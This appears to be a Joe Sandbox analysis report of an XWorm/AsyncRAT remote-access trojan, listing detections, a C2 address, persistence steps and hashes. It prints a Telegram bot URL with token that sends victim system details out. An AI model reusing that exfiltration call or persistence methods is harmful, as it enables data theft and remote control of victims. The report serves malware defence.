                                  Source: Yara matchFile source: 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                                  Windows Management Instrumentation                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		1
                                  Disable or Modify Tools                                  		OS Credential Dumping1
                                  File and Directory Discovery                                  		Remote Services11
                                  Archive Collected Data                                  		1
                                  Web Service                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Scheduled Task/Job                                  		1
                                  Scheduled Task/Job                                  		11
                                  Process Injection                                  		1
                                  Deobfuscate/Decode Files or Information                                  		LSASS Memory23
                                  System Information Discovery                                  		Remote Desktop Protocol1
                                  Clipboard Data                                  		3
                                  Ingress Tool Transfer                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain AccountsAt21
                                  Registry Run Keys / Startup Folder                                  		1
                                  Scheduled Task/Job                                  		1
                                  Obfuscated Files or Information                                  		Security Account Manager1
                                  Query Registry                                  		SMB/Windows Admin SharesData from Network Shared Drive11
                                  Encrypted Channel                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                                  Registry Run Keys / Startup Folder                                  		2
                                  Software Packing                                  		NTDS541
                                  Security Software Discovery                                  		Distributed Component Object ModelInput Capture1
                                  Non-Standard Port                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                  DLL Side-Loading                                  		LSA Secrets1
                                  Process Discovery                                  		SSHKeylogging3
                                  Non-Application Layer Protocol                                  		Scheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                  Masquerading                                  		Cached Domain Credentials151
                                  Virtualization/Sandbox Evasion                                  		VNCGUI Input Capture14
                                  Application Layer Protocol                                  		Data Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                                  Virtualization/Sandbox Evasion                                  		DCSync1
                                  Application Window Discovery                                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                  Process Injection                                  		Proc Filesystem1
                                  System Network Configuration Discovery                                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561588 Sample: WV7Gj9lJ7W.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 25 api.telegram.org 2->25 27 ip-api.com 2->27 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 43 19 other signatures 2->43 8 WV7Gj9lJ7W.exe 15 6 2->8         started        13 svchost.exe 1 2->13         started        15 svchost.exe 2->15         started        17 5 other processes 2->17 signatures3 41 Uses the Telegram API (likely for C&C communication) 25->41 process4 dnsIp5 29 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->29 31 api.telegram.org 149.154.167.220, 443, 49731 TELEGRAMRU United Kingdom 8->31 33 104.198.168.179, 1337, 49732 GOOGLEUS United States 8->33 23 C:\Users\user\AppData\Local\...\svchost.exe, PE32 8->23 dropped 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->45 47 Protects its processes via BreakOnTermination flag 8->47 49 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->49 57 3 other signatures 8->57 19 schtasks.exe 1 8->19         started        51 Antivirus detection for dropped file 13->51 53 Multi AV Scanner detection for dropped file 13->53 55 Machine Learning detection for dropped file 13->55 file6 signatures7 process8 process9 21 conhost.exe 19->21         started       

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  WV7Gj9lJ7W.exe76%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                                  WV7Gj9lJ7W.exe100%AviraTR/Spy.Gen
                                  WV7Gj9lJ7W.exe100%Joe Sandbox ML

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Users\user\AppData\Local\Temp\svchost.exe100%AviraTR/Spy.Gen
                                  C:\Users\user\AppData\Local\Temp\svchost.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\svchost.exe76%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  104.198.168.1790%Avira URL Cloudsafe

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  ip-api.com
                                  		208.95.112.1
                                  		truefalse
                                    		high
                                    api.telegram.org
                                    		149.154.167.220
                                    		truefalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://api.telegram.org/botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spooferfalse
                                        		high
                                        127.0.0.1false
                                          		high
                                          http://ip-api.com/line/?fields=hostingfalse
                                            		high
                                            104.198.168.179true
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://api.telegram.org/botWV7Gj9lJ7W.exe, svchost.exe.0.drfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWV7Gj9lJ7W.exe, 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                208.95.112.1
                                                		ip-api.comUnited States
                                                		53334TUT-ASUSfalse
                                                149.154.167.220
                                                		api.telegram.orgUnited Kingdom
                                                		62041TELEGRAMRUfalse
                                                104.198.168.179
                                                		unknownUnited States
                                                		15169GOOGLEUSfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1561588
                                                Start date and time:2024-11-23 21:04:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 37s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:14
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:WV7Gj9lJ7W.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:45b4e53e206933804c6febfcd5bddc27599c63aaaa2921afacc4d7f52a853f3a.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@11/4@2/3
                                                EGA Information:
                                                • Successful, ratio: 12.5%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 96
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target svchost.exe, PID 1720 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 2448 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 3868 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 5216 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 6044 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 7164 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 984 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • VT rate limit hit for: WV7Gj9lJ7W.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                15:05:06API Interceptor12188108x Sleep call for process: WV7Gj9lJ7W.exe modified
                                                20:05:06Task SchedulerRun new task: svchost path: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                20:05:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\Temp\svchost.exe
                                                20:05:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\Temp\svchost.exe
                                                20:05:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                208.95.112.118sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                • ip-api.com/line/?fields=hosting
                                                UH7iNNKgPW.exeGet hashmaliciousXWormBrowse
                                                • ip-api.com/line/?fields=hosting
                                                18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • ip-api.com/line/?fields=hosting
                                                cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                • ip-api.com/json/?fields=225545
                                                z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • ip-api.com/json/
                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • ip-api.com/json/
                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • ip-api.com/json/
                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                • ip-api.com/line/

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ip-api.com18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                UH7iNNKgPW.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • 208.95.112.1
                                                cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                • 208.95.112.1
                                                z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • 208.95.112.1
                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • 208.95.112.1
                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • 208.95.112.1
                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                http://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                • 208.95.112.2
                                                api.telegram.org18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                • 149.154.167.220
                                                SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousAmadey, XWormBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousXWormBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                • 149.154.167.220
                                                bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                • 149.154.167.220
                                                order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                • 149.154.167.220

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TELEGRAMRU18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                • 149.154.167.220
                                                21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                • 149.154.167.99
                                                SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousAmadey, XWormBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousXWormBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                • 149.154.167.220
                                                bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                • 149.154.167.220
                                                TUT-ASUS18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                UH7iNNKgPW.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • 208.95.112.1
                                                cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                • 208.95.112.1
                                                z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • 208.95.112.1
                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • 208.95.112.1
                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • 208.95.112.1
                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                http://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                • 208.95.112.2

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0e18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                • 149.154.167.220
                                                kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 149.154.167.220
                                                psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                • 149.154.167.220
                                                SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                • 149.154.167.220
                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 149.154.167.220
                                                17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                • 149.154.167.220

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                File Type:CSV text
                                                Category:dropped
                                                Size (bytes):654
                                                Entropy (8bit):5.380476433908377
                                                Encrypted:false
                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                C:\Users\user\AppData\Local\Temp\Log.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                File Type:Generic INItialization configuration [WIN]
                                                Category:modified
                                                Size (bytes):64
                                                Entropy (8bit):3.6722687970803873
                                                Encrypted:false
                                                SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                MD5:DE63D53293EBACE29F3F54832D739D40
                                                SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                                                C:\Users\user\AppData\Local\Temp\svchost.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):85504
                                                Entropy (8bit):6.005743319817595
                                                Encrypted:false
                                                SSDEEP:1536:z/gewX/1Z/xxwvHTLWdEjLHJbE8/8VSpKcaBMFi4OQDYviDUpe:z/g9XNZyTLNtbE8/PNaBSi4OTze
                                                MD5:F5869349B4C3C5902601673CCB454F8C
                                                SHA1:0B164E7101927FE06DDBB98B0A85BDD7757F1734
                                                SHA-256:45B4E53E206933804C6FEBFCD5BDDC27599C63AAAA2921AFACC4D7F52A853F3A
                                                SHA-512:2B6EC9FE1F7D4F9D2884AF9D2274C62492555835533864E7C8998461C5598E6C999401D4EA33AF0404E461C6EF2671BC0C8100C6FA244A35FAAC9224BC012712
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 76%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag.................D...........b... ........@.. ....................................@..................................b..S.................................................................................... ............... ..H............text....C... ...D.................. ..`.rsrc................F..............@..@.reloc...............L..............@..B.................b......H.......Hh..`.......&.....................................................(....*.r...p*. T...*..(....*.r+..p*. ..e.*.s.........s.........s.........s.........*.rU..p*. .O..*.r...p*.r...p*. ...*.r...p*. R...*.r...p*. ..|.*..((...*.r...p*. ?...*.r4..p*. ...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(^...*"(....+.*"(....+.*&(7...&+.*.+5sl... .... .'..om...(,...~....-.(b...(T...~....on...&.-.*.r...p*. ....*.r...p*. ...*.r...p*. .x!.*.r...p*.r2..p*. ....*.r\..p*. ....*.r...p*.

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                Download File
                                                Process:C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 19:05:05 2024, mtime=Sat Nov 23 19:05:05 2024, atime=Sat Nov 23 19:05:05 2024, length=85504, window=hide
                                                Category:dropped
                                                Size (bytes):1052
                                                Entropy (8bit):4.976805859422824
                                                Encrypted:false
                                                SSDEEP:12:8OqkT+4onWCedaGpMXRawJgK/PcmjAWZfE1HgUNwuLEFU44t2YZ/elFlSJmZmV:80oWhyXRDJgK/XAsfEV7kFDqyFm
                                                MD5:2C93CB9F77378DFD9BF306193F90FA57
                                                SHA1:06D6068777218318DA632A4252ABED3022832C00
                                                SHA-256:CE266DEBADEEF70423058B8BA424B1E1E099061D7C6EF8506B769FA28837DB41
                                                SHA-512:347CE16914FDA7CE4DB36E7B256E1F950A62B94B92FC4B2524E30B40E00F80CE55E7728AA46FC2C2CBF68B9FB89D23B595C5F5A557FA174D1148CE4E8F82B2D7
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.... .....1..=....1..=....1..=...N........................:..DG..Yr?.D..U..k0.&...&......vk.v......j..=....^..=......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^wY.............................%..A.p.p.D.a.t.a...B.P.1.....wY....Local.<......CW.^wY......b.....................x...L.o.c.a.l.....N.1.....wY....Temp..:......CW.^wY......l.....................Qy..T.e.m.p.....b.2..N..wY.. .svchost.exe.H......wY..wY............................OX(.s.v.c.h.o.s.t...e.x.e.......\...............-.......[.............0......C:\Users\user\AppData\Local\Temp\svchost.exe..(.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.s.v.c.h.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......494126...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD.

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.005743319817595
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:WV7Gj9lJ7W.exe
                                                File size:85'504 bytes
                                                MD5:f5869349b4c3c5902601673ccb454f8c
                                                SHA1:0b164e7101927fe06ddbb98b0a85bdd7757f1734
                                                SHA256:45b4e53e206933804c6febfcd5bddc27599c63aaaa2921afacc4d7f52a853f3a
                                                SHA512:2b6ec9fe1f7d4f9d2884af9d2274c62492555835533864e7c8998461c5598e6c999401d4ea33af0404e461c6ef2671bc0c8100c6fa244a35faac9224bc012712
                                                SSDEEP:1536:z/gewX/1Z/xxwvHTLWdEjLHJbE8/8VSpKcaBMFi4OQDYviDUpe:z/g9XNZyTLNtbE8/PNaBSi4OTze
                                                TLSH:A8839E2C77EA0529E5FFAFB51CF13256CB75F6231903D61F24C602CA1613A89CD81AE9
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag.................D...........b... ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:90cececece8e8eb0

                                                Static PE Info

                                                General

                                                Entrypoint:0x4162fe
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6741C995 [Sat Nov 23 12:24:53 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
